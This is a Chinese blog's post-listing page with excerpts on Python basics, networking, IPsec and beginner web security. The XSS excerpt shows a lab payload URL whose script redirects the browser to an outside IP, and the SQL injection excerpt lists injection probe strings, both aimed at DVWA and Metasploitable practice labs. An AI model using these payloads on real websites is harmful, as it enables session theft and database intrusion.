- 博客(20)
- 收藏
- 关注
RSS订阅原创 python学习笔记(七)
python操作MySql数据库: 要使用pymysql第三方驱动pip(python install package)—python包管理器在线安装:pip install 第三方模块名称离线安装:有网的时候下载安装包 xxx.zip xxx.tar.gz xxx.whl,然后pip install xxx.whl;若是源代码包则解压之后cd到解压包路径中运行python setup.py...
2019-11-15 20:55:43
253
原创 python学习笔记(六)
闭包(closure):能够访问其他函数内部变量的函数就叫做闭包,弱数据类型的语言特有的现象闭包最大的特点就是将局部变量全局化;但导致了局部变量无法释放,常驻内存,内存的占有比较高优点:局部变量全局化,可常驻内存,只是作用域比较小,代码整合时可以防止变量覆盖#这是一个闭包:inner函数能够访问outer函数内部变量a#引用传递是将函数内存地址赋给变量,函数调用是将函数返回值赋给变量de...
2019-11-07 15:43:20
285
原创 python学习笔记(四)
常见的系统模块(os、sys、hashlib、time、datetime、math、random)(1)Win+R运行cmd(2)输入 pip list + 回车:这个操作方法是查询已经安装的模块(3)输入 pip install + 模块名:这个操作是安装相应的模块!包和模块包:package—可以将文件夹理解为包,但是包不是文件夹模块:module—xxx.py文件(导入模块可以...
2019-10-30 22:50:39
292
原创 python学习笔记(三)
函数#全局函数:print、input、str、int、float、set、sorted、list、dir、help、max、min、abs(绝对值)、all(所有为真才为真)、any(全为假才为假)、bin()二进制、hex()转十六进制、exit()、sum()、type()、round()、reversed()、pow()、ord()(转ASCII值)……python中表示假:Fal...
2019-10-28 01:12:58
306
原创 python学习笔记(二)
常见的容器(复合数据类型)容器的引入:为解决大量数据同时操作的问题(python中没有数组)list 列表set 集合dict 字典tuple 元组list:线性表ls = [] 或者ls = list([1,2,3])元素的访问:使用下标,从0开始遍历:#for遍历for index in list: print(index) #while遍历index=0wh...
2019-10-24 00:14:19
248
原创 python学习笔记(一)
一、基础知识#1、标准输入输出函数:print(“字符串”)input(“请输入提示信息:”)#2、变量:(在程序运行中,可以发生变化的量:更加灵活的参与运算)变量的定义变量名称=变量值(变量值属于什么类型,赋予对于的数据类型–弱数据类型)弱数据类型:python Javascript强数据类型:c c++ c# java变量命名规则(1)变量名称只能是大小写字母 数字 下划...
2019-10-20 23:33:27
217
原创 HTTP及SSL简单理解
浏览器访问URL的一般过程:1、格式验证与协议选择(默认为HTTP)首先我们应该知道,浏览器也是有自己独立的人格的,主人的命令如果是对的,那自然照做。那如果是错误的,那就必然不会听取命令,当然也不能听取命令?故当我们在浏览器中输入希望查询的URL,如果输入的是非法无效的网址,浏览器就会提示出错了。所以,第一步是浏览器对用户输入的网址做初步的格式化检查,只有通过以上检查才会进入下一步。那么...
2019-09-01 17:36:27
1423
原创 浏览器输入URL后的一般过程
浏览器访问URL的一般过程:1、格式验证与协议选择(默认为HTTP)首先我们应该知道,浏览器也是有自己独立的人格的,主人的命令如果是对的,那自然照做。那如果是错误的,那就必然不会听取命令,当然也不能听取命令?故当我们在浏览器中输入希望查询的URL,如果输入的是非法无效的网址,浏览器就会提示出错了。所以,第一步是浏览器对用户输入的网址做初步的格式化检查,只有通过以上检查才会进入下一步。那么...
2019-04-18 14:08:47
468
原创 信息收集及漏洞利用--安全(四)
信息收集收集目标web服务器的网络信息、系统信息、组织信息网络信息 包括:域名、TCP/UDP的端口、网络协议、防火墙、访问控制策略等系统信息 包括:系统标识、站点目录、系统架构、路由表、测试/临时文件组织信息 包括:员工信息、邮箱/电话、公司地址、组织网站、组织背景等whois信息收集注册人、电话、邮箱、dns、地址等whois 信息 whois.chinaz.com , wwww...
2019-04-03 17:30:47
2992
3
原创 python小程序表白
from tkinter import *from tkinter import messagebox#from PIL import Imagedef closeWindow(): #print("1") #还可以showerror,结果不同 messagebox.showinfo(title="警告",message="不许关闭,略略略") return...
2019-04-03 17:29:18
5149
2
原创 XSS简单理解--安全(三)
XSS,跨站脚本攻击通常指黑客通过HTML注入(控制输入变量)篡改网页,插入恶意脚本防御手段:在输入时过滤某些语句(黑名单/白名单技术)构造的URL如下:http://192.168.122.130/DVWA-1.9/vulnerabilities/xss_r/?name=<script>document.location = 'http://172.16.20.116:808...
2019-03-26 19:26:03
521
原创 SQL注入--安全(二)
写在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。1、程序猿在写代码时会有意识的进行防御设置,或者安全测试来封堵web注入2、各大安全厂商生产的硬件或者软件WAF产品黑名单过滤技术1、过滤sql关键字段常见的关键字:and、or、union a...
2019-03-25 23:56:50
7666
5
原创 BCMSN三层架构
如果有什么不正确或者不足的地方,欢迎随时联系我,谢谢!一、实验要求:如图:1、ISP与SW1以及SW2之间为三层接口,连接HTTP服务器的SW1与SW2的接口也为三层2、内网地址为172.16.0.0/163、使用HSRP(10秒)或VRRP(3秒)、STP、VLAN、DTP、trunk、VTP4、控制路由条目表数量5、全网可达、PC dhcp地址6、断开SW1或SW2时,网络依...
2019-03-25 20:04:52
544
2
原创 初探SQL注入--安全
Sql注入1、测试交互方法,判断浏览器提交数据和web服务器的交互方式get 提交 提交的数据在url中显示post 提交 没有在url中显示2、判断提交变量的数据类型 + 整型 id = 1 and 1=2 //让提交数据为False(假) 有交互数据显示则为整型,否则为str + 字符型 id = 1 and 1=2 无交互显示,则进一步判断闭合方式 常见的闭合方法 ‘’,“ ”,( ...
2019-03-14 20:26:12
1787
原创 关于IPSEC的简单总结
密码学基础安全三要素:完整性、私密性、不可否认性(合法性)一、完整性:数据没有遭到损坏,或者篡改通过完整性算法进行完整性校验:哈希算法----不可逆算法MD5 SHA例如本地:MD5(原始数据+秘钥)=KEY1原始数据+KEY1 发送到邻居处邻居:MD5(原始信息+本地秘钥)=KEY2若KEY1=KEY2,则表示认证成功。二、私密性:数据通过转换,形成另一种格式(就是转换为让其他...
2019-03-12 20:53:16
1792
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人